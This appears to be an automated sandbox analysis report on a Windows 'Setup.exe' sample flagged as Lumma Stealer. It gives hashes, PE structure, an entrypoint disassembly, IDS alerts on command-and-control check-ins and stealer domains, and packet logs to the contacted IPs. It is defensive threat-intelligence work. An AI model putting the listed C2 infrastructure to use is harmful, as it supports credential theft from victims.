                                                                                                                WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                • 104.21.33.249
                                                                                                                • 172.67.173.224
                                                                                                                • 188.114.96.3
                                                                                                                • 104.102.49.254
                                                                                                                • 172.67.140.193
                                                                                                                • 104.21.77.78
                                                                                                                • 104.21.79.35
                                                                                                                • 172.67.206.204

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                No created / dropped files found

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):6.416777592795084
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:Setup.exe
                                                                                                                File size:19'250'176 bytes
                                                                                                                MD5:f1113fd6005b558b0a9624edd97dbd58
                                                                                                                SHA1:6a0b156e56f99d81e4567d5b4e0d296957f38746
                                                                                                                SHA256:faaf64f9c081fdcf8715679549607bba7f70b594459167cf9f5a9b73664d89ba
                                                                                                                SHA512:f229362283073eab59a0b6c8f9173920abb6516e36c9414a89572f5492c73563d52f571790500af8a67a8ba9748ac29fe112a10910f6e3c77b27e09cfaf565a9
                                                                                                                SSDEEP:98304:a/AdF5wjB2FFANtTT7q/fxZjhorJdmTnAZPwcdQXadAwrtyEdrup6KCKtr454cbP:3FWqsTQftoG0ZPwZXqdJhQrIbp7FL
                                                                                                                TLSH:B1173941FACBD4F5E9034830459BB22F63345D058B28CACBEB447A7AF8372D29DB6255
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........%......................... .............@...........................).....Uh&...@................................

                                                                                                                File Icon

                                                                                                                Icon Hash:2d2e3797b32b2b99

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x47aa20
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:6
                                                                                                                OS Version Minor:1
                                                                                                                File Version Major:6
                                                                                                                File Version Minor:1
                                                                                                                Subsystem Version Major:6
                                                                                                                Subsystem Version Minor:1
                                                                                                                Import Hash:1aae8bf580c846f39c71c05898e57e88

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                jmp 00007F114912D210h
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                sub esp, 28h
                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                mov dword ptr [esp+10h], ebp
                                                                                                                mov dword ptr [esp+14h], esi
                                                                                                                mov dword ptr [esp+18h], edi
                                                                                                                mov dword ptr [esp], eax
                                                                                                                mov dword ptr [esp+04h], ecx
                                                                                                                call 00007F1149107B66h
                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                mov edi, dword ptr [esp+18h]
                                                                                                                mov esi, dword ptr [esp+14h]
                                                                                                                mov ebp, dword ptr [esp+10h]
                                                                                                                mov ebx, dword ptr [esp+1Ch]
                                                                                                                add esp, 28h
                                                                                                                retn 0004h
                                                                                                                ret
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                sub esp, 08h
                                                                                                                mov ecx, dword ptr [esp+0Ch]
                                                                                                                mov edx, dword ptr [ecx]
                                                                                                                mov eax, esp
                                                                                                                mov dword ptr [edx+04h], eax
                                                                                                                sub eax, 00010000h
                                                                                                                mov dword ptr [edx], eax
                                                                                                                add eax, 00000BA0h
                                                                                                                mov dword ptr [edx+08h], eax
                                                                                                                mov dword ptr [edx+0Ch], eax
                                                                                                                lea edi, dword ptr [ecx+34h]
                                                                                                                mov dword ptr [edx+18h], ecx
                                                                                                                mov dword ptr [edi], edx
                                                                                                                mov dword ptr [esp+04h], edi
                                                                                                                call 00007F114912F674h
                                                                                                                cld
                                                                                                                call 00007F114912E6FEh
                                                                                                                call 00007F114912D339h
                                                                                                                add esp, 08h
                                                                                                                ret
                                                                                                                jmp 00007F114912F520h
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                mov ebx, dword ptr [esp+04h]
                                                                                                                mov ebp, esp
                                                                                                                mov dword ptr fs:[00000034h], 00000000h
                                                                                                                mov ecx, dword ptr [ebx+04h]
                                                                                                                cmp ecx, 00000000h
                                                                                                                je 00007F114912F521h
                                                                                                                mov eax, ecx
                                                                                                                shl eax, 02h
                                                                                                                sub esp, eax
                                                                                                                mov edi, esp
                                                                                                                mov esi, dword ptr [ebx+08h]
                                                                                                                cld
                                                                                                                rep movsd

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x12200000x44c.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x12960000x1f54.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x12210000x730ec.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x11434c00xb4.data
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x8aeee80x8af00005c2e7956f35d34727636aa107313adfunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x8b00000x8908a40x890a001857d9b6a2a3970db7b60edf4f86520dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x11410000xded0c0xa64003f9b5464b358ed1fc0ab46eef38db575False0.4051779840225564data6.123134897417408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata0x12200000x44c0x6006ebd05be7ca24a5e9c9fb34934b91e22False0.3600260416666667OpenPGP Public Key3.9465439874144463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .reloc0x12210000x730ec0x73200cced2f04c20a6dbbb87a66193555e3aaFalse0.5499457111834962data6.635327694181241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                .symtab0x12950000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x12960000x1f540x2000c2d76dd7b5c9020e3df76652a00f383fFalse0.3314208984375data4.6761607891525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0x12961d40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                RT_ICON0x12962fc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                RT_ICON0x12968640x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                RT_ICON0x1296b4c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                RT_GROUP_ICON0x12973f40x3edataEnglishUnited States0.8387096774193549
                                                                                                                RT_VERSION0x12974340x4f4dataEnglishUnited States0.27208201892744477
                                                                                                                RT_MANIFEST0x12979280x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-10-13T12:00:28.046409+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736188.114.97.3443TCP
                                                                                                                2024-10-13T12:00:28.046409+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736188.114.97.3443TCP
                                                                                                                2024-10-13T12:00:28.058427+02002056570ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)1192.168.2.4552151.1.1.153UDP
                                                                                                                2024-10-13T12:00:28.579610+02002056571ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)1192.168.2.449737188.114.96.3443TCP
                                                                                                                2024-10-13T12:00:29.015426+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737188.114.96.3443TCP
                                                                                                                2024-10-13T12:00:29.015426+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737188.114.96.3443TCP
                                                                                                                2024-10-13T12:00:29.017335+02002056568ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)1192.168.2.4580641.1.1.153UDP
                                                                                                                2024-10-13T12:00:29.044146+02002056566ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)1192.168.2.4581641.1.1.153UDP
                                                                                                                2024-10-13T12:00:29.570044+02002056567ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)1192.168.2.449738104.21.33.249443TCP
                                                                                                                2024-10-13T12:00:30.024392+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449738104.21.33.249443TCP
                                                                                                                2024-10-13T12:00:30.024392+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738104.21.33.249443TCP
                                                                                                                2024-10-13T12:00:30.077573+02002056564ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)1192.168.2.4495011.1.1.153UDP
                                                                                                                2024-10-13T12:00:30.581850+02002056565ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)1192.168.2.449739104.21.77.78443TCP
                                                                                                                2024-10-13T12:00:30.979674+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449739104.21.77.78443TCP
                                                                                                                2024-10-13T12:00:30.979674+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.77.78443TCP
                                                                                                                2024-10-13T12:00:30.993990+02002056562ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)1192.168.2.4588451.1.1.153UDP
                                                                                                                2024-10-13T12:00:31.511896+02002056563ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)1192.168.2.449740172.67.140.193443TCP
                                                                                                                2024-10-13T12:00:31.974411+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449740172.67.140.193443TCP
                                                                                                                2024-10-13T12:00:31.974411+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449740172.67.140.193443TCP
                                                                                                                2024-10-13T12:00:31.976753+02002056560ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)1192.168.2.4497091.1.1.153UDP
                                                                                                                2024-10-13T12:00:32.501560+02002056561ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)1192.168.2.449741172.67.173.224443TCP
                                                                                                                2024-10-13T12:00:32.962498+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449741172.67.173.224443TCP
                                                                                                                2024-10-13T12:00:32.962498+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.173.224443TCP
                                                                                                                2024-10-13T12:00:32.981280+02002056558ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)1192.168.2.4579561.1.1.153UDP
                                                                                                                2024-10-13T12:00:33.483066+02002056559ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)1192.168.2.449742104.21.79.35443TCP
                                                                                                                2024-10-13T12:00:33.944460+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449742104.21.79.35443TCP
                                                                                                                2024-10-13T12:00:33.944460+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742104.21.79.35443TCP
                                                                                                                2024-10-13T12:00:33.952216+02002056556ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)1192.168.2.4511891.1.1.153UDP
                                                                                                                2024-10-13T12:00:34.145782+02002056557ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)1192.168.2.449743188.114.97.3443TCP
                                                                                                                2024-10-13T12:00:35.413053+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449744104.102.49.254443TCP
                                                                                                                2024-10-13T12:00:36.251128+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449745172.67.206.204443TCP
                                                                                                                2024-10-13T12:00:36.251128+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745172.67.206.204443TCP
                                                                                                                2024-10-13T12:00:37.287454+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449746172.67.206.204443TCP
                                                                                                                2024-10-13T12:00:37.287454+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746172.67.206.204443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 13, 2024 12:00:26.813090086 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:26.813182116 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:26.813503981 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:26.817025900 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:26.817102909 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:27.319123983 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:27.319257975 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:27.360507011 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:27.360589027 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:27.361474991 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:27.422916889 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:27.617378950 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:27.617410898 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:27.617618084 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.046444893 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.046678066 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.046854019 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:28.049194098 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:28.049263954 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.049315929 CEST49736443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:28.049334049 CEST44349736188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.073508978 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:28.073595047 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.073918104 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:28.074085951 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:28.074125051 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.579476118 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.579610109 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:28.581970930 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:28.581999063 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.582375050 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:28.583933115 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:28.583933115 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:28.584176064 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.015501976 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.015728951 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.015922070 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:29.015923023 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:29.015923023 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:29.064994097 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:29.065078974 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.065186024 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:29.065593004 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:29.065630913 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.317600965 CEST49737443192.168.2.4188.114.96.3
                                                                                                                Oct 13, 2024 12:00:29.317662954 CEST44349737188.114.96.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.569945097 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.570044041 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:29.572174072 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:29.572201014 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.572577953 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:29.574124098 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:29.574163914 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:29.574330091 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.024441957 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.024684906 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.024889946 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:30.068192005 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:30.068192005 CEST49738443192.168.2.4104.21.33.249
                                                                                                                Oct 13, 2024 12:00:30.068258047 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.068298101 CEST44349738104.21.33.249192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.095501900 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.095588923 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.095698118 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.095987082 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.096020937 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.581763029 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.581850052 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.584156036 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.584187031 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.584527969 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.585673094 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.585673094 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.585762024 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.979680061 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.979780912 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.980010033 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.980257034 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.980303049 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:30.980334044 CEST49739443192.168.2.4104.21.77.78
                                                                                                                Oct 13, 2024 12:00:30.980349064 CEST44349739104.21.77.78192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.010396957 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.010482073 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.010759115 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.011128902 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.011188030 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.511683941 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.511895895 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.514389992 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.514420033 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.514935017 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.516587019 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.516644955 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.516674995 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.974452019 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.974730968 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.974932909 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.974932909 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.974934101 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:31.997968912 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:31.997991085 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:31.998061895 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:31.998517036 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:31.998522997 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.286341906 CEST49740443192.168.2.4172.67.140.193
                                                                                                                Oct 13, 2024 12:00:32.286402941 CEST44349740172.67.140.193192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.501454115 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.501559973 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:32.503834009 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:32.503839016 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.504307985 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.506055117 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:32.506087065 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:32.506277084 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.962544918 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.962779999 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.962845087 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:32.968961000 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:32.968971014 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:32.968985081 CEST49741443192.168.2.4172.67.173.224
                                                                                                                Oct 13, 2024 12:00:32.968990088 CEST44349741172.67.173.224192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.004656076 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.004705906 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.004796028 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.005290031 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.005306005 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.482741117 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.483066082 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.484863043 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.484873056 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.485354900 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.487468004 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.487494946 CEST49742443192.168.2.4104.21.79.35
